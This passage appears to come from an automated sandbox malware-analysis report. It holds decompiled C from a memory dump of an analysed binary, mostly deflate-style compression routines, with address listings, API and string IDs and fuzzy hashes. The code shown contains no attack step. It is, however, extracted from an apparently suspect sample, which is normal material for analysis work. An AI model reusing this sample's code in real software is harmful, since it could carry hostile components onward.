                  									 *(_t390 + _t337 - 0x160) = 0x11;
                  								}
                  								 *((char*)(_t390 + _t337 - 0x15f)) = _t361;
                  								goto L46;
                  							} else {
                  								 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t360;
                  								E0040FDD0( &_v356 + _t337, 0, _t360);
                  								_t393 = _t393 + 0xc;
                  								_t337 = _t337 + _v12;
                  							}
                  						}
                  					} else {
                  						if(_t381 >= 3) {
                  							 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  							 *(_t390 + _t337 - 0x160) = 0x10;
                  							 *((char*)(_t390 + _t337 - 0x15f)) = _t381 - 3;
                  							L46:
                  							_t337 = _t337 + 2;
                  						} else {
                  							 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t381;
                  							E0040FDD0( &_v356 + _t337, _v24, _t381);
                  							_t393 = _t393 + 0xc;
                  							_t337 = _t337 + _v8;
                  						}
                  					}
                  				}
                  				_push(0);
                  				_push(7);
                  				_push(0x13);
                  				_t385 = 2;
                  				E00402D85(_t383, _t385);
                  				_t341 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t385 << _t341;
                  				_t387 = 0xfffffff8;
                  				_t283 = _t341 + 2;
                  				_t374 = 8;
                  				 *(_t383 + 0x44) = _t283;
                  				if(_t283 >= _t374) {
                  					do {
                  						_t356 =  *(_t383 + 0x30);
                  						if(_t356 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t356 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t342 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v16 + 0xfffffeff << _t342;
                  				_t287 = _t342 + 5;
                  				 *(_t383 + 0x44) = _t287;
                  				if(_t287 >= _t374) {
                  					do {
                  						_t355 =  *(_t383 + 0x30);
                  						if(_t355 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t355 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t343 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v32 - 0x00000001 << _t343;
                  				_t291 = _t343 + 5;
                  				 *(_t383 + 0x44) = _t291;
                  				if(_t291 >= _t374) {
                  					do {
                  						_t354 =  *(_t383 + 0x30);
                  						if(_t354 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t354 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t344 = 0x12;
                  				while(1) {
                  					_t186 = _t344 + 0x4111a0; // 0xf
                  					if( *((char*)(( *_t186 & 0x000000ff) + _t383 + 0x9152)) != 0) {
                  						break;
                  					}
                  					_t344 = _t344 - 1;
                  					if(_t344 >= 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_t189 = _t344 + 1; // 0x12
                  				_t345 = 4;
                  				_t294 =  <  ? _t345 : _t189;
                  				_t346 =  *(_t383 + 0x44);
                  				_v16 = _t294;
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t294 + 0xfffffffc << _t346;
                  				_t297 = _t346 + 4;
                  				 *(_t383 + 0x44) = _t297;
                  				if(_t297 >= _t374) {
                  					do {
                  						_t353 =  *(_t383 + 0x30);
                  						if(_t353 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							_t297 =  *(_t383 + 0x48);
                  							 *_t353 = _t297;
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t388 = 0;
                  				_t375 = 0;
                  				if(_v16 > 0) {
                  					_t389 = _v16;
                  					do {
                  						_t208 = _t375 + 0x4111a0; // 0x121110
                  						_t351 =  *(_t383 + 0x44);
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(( *_t208 & 0x000000ff) + _t383 + 0x9152) & 0x000000ff) << _t351;
                  						_t297 = _t351 + 3;
                  						 *(_t383 + 0x44) = _t297;
                  						if(_t297 >= 8) {
                  							do {
                  								_t352 =  *(_t383 + 0x30);
                  								if(_t352 <  *((intOrPtr*)(_t383 + 0x34))) {
                  									_t297 =  *(_t383 + 0x48);
                  									 *_t352 = _t297;
                  									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  								}
                  								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  							} while ( *(_t383 + 0x44) >= 8);
                  						}
                  						_t375 = _t375 + 1;
                  					} while (_t375 < _t389);
                  					_t388 = 0;
                  				}
                  				if(_t337 != 0) {
                  					do {
                  						_t298 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
                  						_t388 = _t388 + 1;
                  						_t347 =  *(_t383 + 0x44);
                  						_v16 = _t298;
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(_t383 + 0x8cd2 + _t298 * 2) & 0x0000ffff) << _t347;
                  						_t301 = _t347 + ( *(_t383 + _t298 + 0x9152) & 0x000000ff);
                  						 *(_t383 + 0x44) = _t301;
                  						if(_t301 >= 8) {
                  							do {
                  								_t350 =  *(_t383 + 0x30);
                  								if(_t350 <  *((intOrPtr*)(_t383 + 0x34))) {
                  									 *_t350 =  *(_t383 + 0x48);
                  									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  								}
                  								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  							} while ( *(_t383 + 0x44) >= 8);
                  						}
                  						_t297 = _v16;
                  						if(_t297 >= 0x10) {
                  							_t377 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
                  							_t388 = _t388 + 1;
                  							_t348 =  *(_t383 + 0x44);
                  							_t297 = ( &__imp__IsProcessorFeaturePresent)[_t297] + _t348;
                  							 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t377 << _t348;
                  							 *(_t383 + 0x44) = _t297;
                  							if(_t297 >= 8) {
                  								do {
                  									_t349 =  *(_t383 + 0x30);
                  									if(_t349 <  *((intOrPtr*)(_t383 + 0x34))) {
                  										_t297 =  *(_t383 + 0x48);
                  										 *_t349 = _t297;
                  										 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  									}
                  									 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  									 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  								} while ( *(_t383 + 0x44) >= 8);
                  							}
                  						}
                  					} while (_t388 < _t337);
                  				}
                  				return _t297;
                  			}
                  0x0040344e
                  0x00403452
                  0x00403456
                  0x0040343e
                  0x0040345c
                  0x00403462
                  0x00403464
                  0x0040346c
                  0x00403474
                  0x00403477
                  0x0040347b
                  0x0040347e
                  0x00403484
                  0x00403486
                  0x00403486
                  0x0040348c
                  0x0040348e
                  0x00403491
                  0x00403493
                  0x00403493
                  0x00403496
                  0x0040349a
                  0x0040349e
                  0x00403486
                  0x00403484
                  0x004034a4
                  0x0040340f
                  0x004034b2

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memset$memcpy
                  • String ID: 0HCw
                  • API String ID: 1551266493-3134391196
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ca43e400cc7215004ac780a32a62955417f8f7f80a22650c2bf1bec3b8deea9e
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 46024830900666EFCB16CF68C9C56EABF74FF45301F14017AC855A7782C73AAA25CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 79%
                  			E004037A9(intOrPtr* __ecx, intOrPtr __edx) {
                  				unsigned int _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				intOrPtr _t271;
                  				signed char _t279;
                  				intOrPtr _t283;
                  				intOrPtr _t291;
                  				signed int _t299;
                  				signed int _t300;
                  				signed char _t303;
                  				signed char _t306;
                  				signed char _t315;
                  				signed char _t324;
                  				signed char _t327;
                  				signed char _t333;
                  				signed int _t342;
                  				signed char _t344;
                  				signed char _t348;
                  				intOrPtr _t357;
                  				signed int _t358;
                  				void* _t359;
                  				void* _t362;
                  				intOrPtr _t363;
                  				signed char _t366;
                  				intOrPtr _t367;
                  				signed char _t370;
                  				signed char _t371;
                  				signed char _t372;
                  				char* _t373;
                  				char* _t374;
                  				char* _t375;
                  				signed char _t376;
                  				char* _t377;
                  				char* _t378;
                  				signed char _t382;
                  				signed char _t383;
                  				signed char _t384;
                  				char* _t385;
                  				char* _t386;
                  				char* _t387;
                  				char* _t388;
                  				char* _t393;
                  				signed char _t394;
                  				signed char _t395;
                  				char* _t396;
                  				char* _t397;
                  				intOrPtr _t398;
                  				int _t400;
                  				intOrPtr _t401;
                  				void* _t402;
                  				signed int _t403;
                  				signed int _t404;
                  				void* _t406;
                  				void* _t410;
                  				intOrPtr _t411;
                  				int _t414;
                  				void* _t415;
                  				signed char _t416;
                  				intOrPtr* _t417;
                  
                  				_t417 = __ecx;
                  				_t357 = __edx;
                  				_v20 = __edx;
                  				_v16 = 0;
                  				if(( *(__ecx + 8) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
                  					_t400 = 0;
                  				} else {
                  					_t400 = 1;
                  				}
                  				if( *_t417 != 0) {
                  					L7:
                  					_t271 = _t417 + 0x39272;
                  					goto L8;
                  				} else {
                  					_t398 =  *((intOrPtr*)(_t417 + 0x8c));
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t398 < 0x14ccc) {
                  						goto L7;
                  					} else {
                  						_t271 =  *((intOrPtr*)(_t417 + 0x74)) + _t398;
                  						L8:
                  						 *((intOrPtr*)(_t417 + 0x30)) = _t271;
                  						_v12 = _t271;
                  						 *((intOrPtr*)(_t417 + 0x34)) = _t271 + 0x14cbc;
                  						 *(_t417 + 0x58) = 0;
                  						 *((intOrPtr*)(_t417 + 0x5c)) = 0;
                  						 *( *(_t417 + 0x2c)) =  *( *(_t417 + 0x2c)) >>  *(_t417 + 0x38);
                  						_t410 = 8;
                  						 *((intOrPtr*)(_t417 + 0x28)) =  *((intOrPtr*)(_t417 + 0x28)) - (0 |  *(_t417 + 0x38) == _t410);
                  						if(( *(_t417 + 8) & 0x00001000) == 0 ||  *((intOrPtr*)(_t417 + 0x64)) != 0) {
                  							L18:
                  							_t366 =  *(_t417 + 0x44);
                  							 *(_t417 + 0x48) =  *(_t417 + 0x48) | (0 | _t357 == 0x00000004) << _t366;
                  							_t64 = _t366 + 1; // 0xf9
                  							_t279 = _t64;
                  							 *(_t417 + 0x44) = _t279;
                  							if(_t279 < _t410) {
                  								L22:
                  								_t411 =  *((intOrPtr*)(_t417 + 0x30));
                  								_t358 =  *(_t417 + 0x44);
                  								_v8 =  *(_t417 + 0x48);
                  								if(_t400 != 0) {
                  									_t401 = _v16;
                  									L47:
                  									if( *((intOrPtr*)(_t417 + 0x1c)) -  *((intOrPtr*)(_t417 + 0x40)) >  *((intOrPtr*)(_t417 + 0x24))) {
                  										L28:
                  										if(_t401 == 0) {
                  											_t87 =  &_v8; // 0x40473a
                  											 *(_t417 + 0x48) =  *_t87;
                  											 *((intOrPtr*)(_t417 + 0x30)) = _t411;
                  											 *(_t417 + 0x44) = _t358;
                  											E0040378E(_t417, _t401 + 1);
                  										}
                  										_t359 = 2;
                  										L31:
                  										_t283 = _v20;
                  										if(_t283 == 0) {
                  											L84:
                  											memset(_t417 + 0x8192, 0, 0x240);
                  											memset(_t417 + 0x83d2, 0, 0x40);
                  											 *(_t417 + 0x38) = 8;
                  											 *((intOrPtr*)(_t417 + 0x28)) = _t417 + 0x9273;
                  											 *(_t417 + 0x2c) = _t417 + 0x9272;
                  											 *((intOrPtr*)(_t417 + 0x40)) =  *((intOrPtr*)(_t417 + 0x40)) +  *(_t417 + 0x3c);
                  											 *((intOrPtr*)(_t417 + 0x64)) =  *((intOrPtr*)(_t417 + 0x64)) + 1;
                  											_t291 = _v12;
                  											 *(_t417 + 0x3c) = 0;
                  											_t362 =  *((intOrPtr*)(_t417 + 0x30)) - _t291;
                  											if(_t362 == 0) {
                  												L92:
                  												return  *((intOrPtr*)(_t417 + 0x5c));
                  											}
                  											if( *_t417 == 0) {
                  												_t402 = _t417 + 0x39272;
                  												if(_t291 != _t402) {
                  													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t362;
                  												} else {
                  													_t367 =  *((intOrPtr*)(_t417 + 0x8c));
                  													_t414 =  <  ? _t362 :  *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t367;
                  													memcpy( *((intOrPtr*)(_t417 + 0x74)) + _t367, _t402, _t414);
                  													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t414;
                  													_t363 = _t362 - _t414;
                  													if(_t363 != 0) {
                  														 *(_t417 + 0x58) = _t414;
                  														 *((intOrPtr*)(_t417 + 0x5c)) = _t363;
                  													}
                  												}
                  												goto L92;
                  											}
                  											 *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x78)))) =  *((intOrPtr*)(_t417 + 0x84)) -  *((intOrPtr*)(_t417 + 0x70));
                  											_t299 =  *_t417(_t417 + 0x39272, _t362,  *((intOrPtr*)(_t417 + 4)));
                  											if(_t299 != 0) {
                  												goto L92;
                  											}
                  											_t300 = _t299 | 0xffffffff;
                  											 *(_t417 + 0x6c) = _t300;
                  											return _t300;
                  										}
                  										_t370 =  *(_t417 + 0x44);
                  										_t415 = 4;
                  										if(_t283 != _t415) {
                  											_t403 = 0;
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
                  											_t303 = _t370 + 3;
                  											 *(_t417 + 0x44) = _t303;
                  											if(_t303 < 8) {
                  												L74:
                  												_t371 =  *(_t417 + 0x44);
                  												if(_t371 == 0) {
                  													do {
                  														L79:
                  														_t372 =  *(_t417 + 0x44);
                  														 *(_t417 + 0x48) =  *(_t417 + 0x48) | (_t403 & 0x0000ffff) << _t372;
                  														_t227 = _t372 + 0x10; // 0x18
                  														_t306 = _t227;
                  														 *(_t417 + 0x44) = _t306;
                  														if(_t306 < 8) {
                  															goto L83;
                  														} else {
                  															goto L80;
                  														}
                  														do {
                  															L80:
                  															_t373 =  *((intOrPtr*)(_t417 + 0x30));
                  															if(_t373 <  *((intOrPtr*)(_t417 + 0x34))) {
                  																 *_t373 =  *(_t417 + 0x48);
                  																 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  															}
                  															 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  															 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  														} while ( *(_t417 + 0x44) >= 8);
                  														L83:
                  														_t403 = _t403 ^ 0x0000ffff;
                  														_t359 = _t359 - 1;
                  													} while (_t359 != 0);
                  													goto L84;
                  												}
                  												 *(_t417 + 0x44) = 8;
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t371;
                  												do {
                  													_t374 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t374 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t374 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= 8);
                  												goto L79;
                  											} else {
                  												goto L71;
                  											}
                  											do {
                  												L71:
                  												_t375 =  *((intOrPtr*)(_t417 + 0x30));
                  												if(_t375 <  *((intOrPtr*)(_t417 + 0x34))) {
                  													 *_t375 =  *(_t417 + 0x48);
                  													 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  												}
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  												 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  											} while ( *(_t417 + 0x44) >= 8);
                  											goto L74;
                  										}
                  										if(_t370 == 0) {
                  											L38:
                  											if(( *(_t417 + 8) & 0x00001000) == 0) {
                  												goto L84;
                  											}
                  											_t404 =  *(_t417 + 0x18);
                  											do {
                  												_t376 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t404 >> 0x00000018 << _t376;
                  												_t113 = _t376 + 8; // 0x10
                  												_t315 = _t113;
                  												 *(_t417 + 0x44) = _t315;
                  												if(_t315 < 8) {
                  													goto L44;
                  												} else {
                  													goto L41;
                  												}
                  												do {
                  													L41:
                  													_t377 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t377 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t377 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= 8);
                  												L44:
                  												_t404 = _t404 << 8;
                  												_t415 = _t415 - 1;
                  											} while (_t415 != 0);
                  											goto L84;
                  										}
                  										 *(_t417 + 0x44) = 8;
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
                  										do {
                  											_t378 =  *((intOrPtr*)(_t417 + 0x30));
                  											if(_t378 <  *((intOrPtr*)(_t417 + 0x34))) {
                  												 *_t378 =  *(_t417 + 0x48);
                  												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  											}
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  										} while ( *(_t417 + 0x44) >= 8);
                  										goto L38;
                  									}
                  									 *((intOrPtr*)(_t417 + 0x30)) = _t411;
                  									_t130 =  &_v8; // 0x40473a
                  									 *(_t417 + 0x48) = 0 << _t358 |  *_t130;
                  									_t324 = _t358 + 2;
                  									_t416 = 8;
                  									 *(_t417 + 0x44) = _t324;
                  									if(_t324 < _t416) {
                  										L52:
                  										_t382 =  *(_t417 + 0x44);
                  										if(_t382 == 0) {
                  											L57:
                  											_t359 = 2;
                  											_t406 = _t359;
                  											do {
                  												_t383 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(_t417 + 0x3c) & 0x0000ffff) << _t383;
                  												_t162 = _t383 + 0x10; // 0x108
                  												_t327 = _t162;
                  												 *(_t417 + 0x44) = _t327;
                  												if(_t327 < _t416) {
                  													goto L62;
                  												} else {
                  													goto L59;
                  												}
                  												do {
                  													L59:
                  													_t386 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t386 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t386 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= _t416);
                  												L62:
                  												 *(_t417 + 0x3c) =  *(_t417 + 0x3c) ^ 0x0000ffff;
                  												_t406 = _t406 - 1;
                  											} while (_t406 != 0);
                  											if( *(_t417 + 0x3c) <= _t406) {
                  												goto L31;
                  											} else {
                  												goto L64;
                  											}
                  											do {
                  												L64:
                  												_t384 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(( *((intOrPtr*)(_t417 + 0x40)) + _t406 & 0x00007fff) + _t417 + 0x90) & 0x000000ff) << _t384;
                  												_t183 = _t384 + 8; // 0x100
                  												_t333 = _t183;
                  												 *(_t417 + 0x44) = _t333;
                  												if(_t333 < _t416) {
                  													goto L68;
                  												} else {
                  													goto L65;
                  												}
                  												do {
                  													L65:
                  													_t385 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t385 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t385 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= _t416);
                  												L68:
                  												_t406 = _t406 + 1;
                  											} while (_t406 <  *(_t417 + 0x3c));
                  											goto L31;
                  										}
                  										 *(_t417 + 0x44) = _t416;
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t382;
                  										do {
                  											_t387 =  *((intOrPtr*)(_t417 + 0x30));
                  											if(_t387 <  *((intOrPtr*)(_t417 + 0x34))) {
                  												 *_t387 =  *(_t417 + 0x48);
                  												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  											}
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  										} while ( *(_t417 + 0x44) >= _t416);
                  										goto L57;
                  									} else {
                  										goto L49;
                  									}
                  									do {
                  										L49:
                  										_t388 =  *((intOrPtr*)(_t417 + 0x30));
                  										if(_t388 <  *((intOrPtr*)(_t417 + 0x34))) {
                  											 *_t388 =  *(_t417 + 0x48);
                  											 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  										}
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  										 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  									} while ( *(_t417 + 0x44) >= _t416);
                  									goto L52;
                  								}
                  								if(( *(_t417 + 8) & 0x00040000) != 0 ||  *(_t417 + 0x3c) < 0x30) {
                  									_t400 = 1;
                  								}
                  								_t401 = E0040378E(_t417, _t400);
                  								if( *(_t417 + 0x3c) == 0 ||  *((intOrPtr*)(_t417 + 0x30)) - _t411 + 1 <  *(_t417 + 0x3c)) {
                  									goto L28;
                  								} else {
                  									goto L47;
                  								}
                  							} else {
                  								goto L19;
                  							}
                  							do {
                  								L19:
                  								_t393 =  *((intOrPtr*)(_t417 + 0x30));
                  								if(_t393 <  *((intOrPtr*)(_t417 + 0x34))) {
                  									 *_t393 =  *(_t417 + 0x48);
                  									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  								}
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  							} while ( *(_t417 + 0x44) >= _t410);
                  							goto L22;
                  						} else {
                  							_t394 =  *(_t417 + 0x44);
                  							_t342 = 0x78;
                  							 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t342 << _t394;
                  							_t344 = _t394 + 8;
                  							 *(_t417 + 0x44) = _t344;
                  							if(_t344 < _t410) {
                  								L14:
                  								_t395 =  *(_t417 + 0x44);
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) | 1 << _t395;
                  								_t47 = _t395 + 8; // 0x100
                  								_t348 = _t47;
                  								 *(_t417 + 0x44) = _t348;
                  								if(_t348 < _t410) {
                  									goto L18;
                  								} else {
                  									goto L15;
                  								}
                  								do {
                  									L15:
                  									_t396 =  *((intOrPtr*)(_t417 + 0x30));
                  									if(_t396 <  *((intOrPtr*)(_t417 + 0x34))) {
                  										 *_t396 =  *(_t417 + 0x48);
                  										 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  									}
                  									 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  									 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  								} while ( *(_t417 + 0x44) >= _t410);
                  								goto L18;
                  							} else {
                  								goto L11;
                  							}
                  							do {
                  								L11:
                  								_t397 =  *((intOrPtr*)(_t417 + 0x30));
                  								if(_t397 <  *((intOrPtr*)(_t417 + 0x34))) {
                  									 *_t397 =  *(_t417 + 0x48);
                  									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  								}
                  								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  							} while ( *(_t417 + 0x44) >= _t410);
                  							goto L14;
                  						}
                  					}
                  				}
                  			}
                  0x00403ab1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403ab3
                  0x00403ab3
                  0x00403ab3
                  0x00403ab9
                  0x00403abe
                  0x00403ac0
                  0x00403ac0
                  0x00403ac3
                  0x00403ac7
                  0x00403acb
                  0x00403ad0
                  0x00403ad0
                  0x00403ad1
                  0x00000000
                  0x00403ad6
                  0x00403a1f
                  0x00403a24
                  0x00403a27
                  0x00403a27
                  0x00403a2d
                  0x00403a32
                  0x00403a34
                  0x00403a34
                  0x00403a37
                  0x00403a3b
                  0x00403a3f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039f9
                  0x004039f9
                  0x004039f9
                  0x004039ff
                  0x00403a04
                  0x00403a06
                  0x00403a06
                  0x00403a09
                  0x00403a0d
                  0x00403a11
                  0x00000000
                  0x004039f9
                  0x004038ed
                  0x004038f7
                  0x004038f7
                  0x00403903
                  0x00403905
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004038b5
                  0x004038b5
                  0x004038b5
                  0x004038bb
                  0x004038c0
                  0x004038c2
                  0x004038c2
                  0x004038c5
                  0x004038c9
                  0x004038cd
                  0x00000000
                  0x00403837
                  0x00403837
                  0x0040383c
                  0x0040383f
                  0x00403842
                  0x00403845
                  0x0040384a
                  0x00403869
                  0x00403869
                  0x00403871
                  0x00403874
                  0x00403874
                  0x00403877
                  0x0040387c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040387e
                  0x0040387e
                  0x0040387e
                  0x00403884
                  0x00403889
                  0x0040388b
                  0x0040388b
                  0x0040388e
                  0x00403892
                  0x00403896
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040384c
                  0x0040384c
                  0x0040384c
                  0x00403852
                  0x00403857
                  0x00403859
                  0x00403859
                  0x0040385c
                  0x00403860
                  0x00403864
                  0x00000000
                  0x0040384c
                  0x0040382f
                  0x004037ef

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID: 0HCw$:G@
                  • API String ID: 368790112-2591896426
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bff9ad06bf82d853f9c70daa61a207c77b125d2d5e3c741b47fcf7fead7e8f56
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 20023171601B108FC776CF29C680523BBF5BF55B227604A2EC6E796E91D23AF941CB08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F6D0(void* __ecx) {
                  				short _v524;
                  				signed short* _t12;
                  				void* _t15;
                  				void* _t19;
                  				signed short _t21;
                  				short* _t24;
                  				signed int _t25;
                  				void* _t26;
                  				short* _t27;
                  				void* _t28;
                  
                  				_t27 = 0;
                  				_t19 = __ecx;
                  				_t26 = 0;
                  				GetModuleFileNameW(0,  &_v524, 0x104);
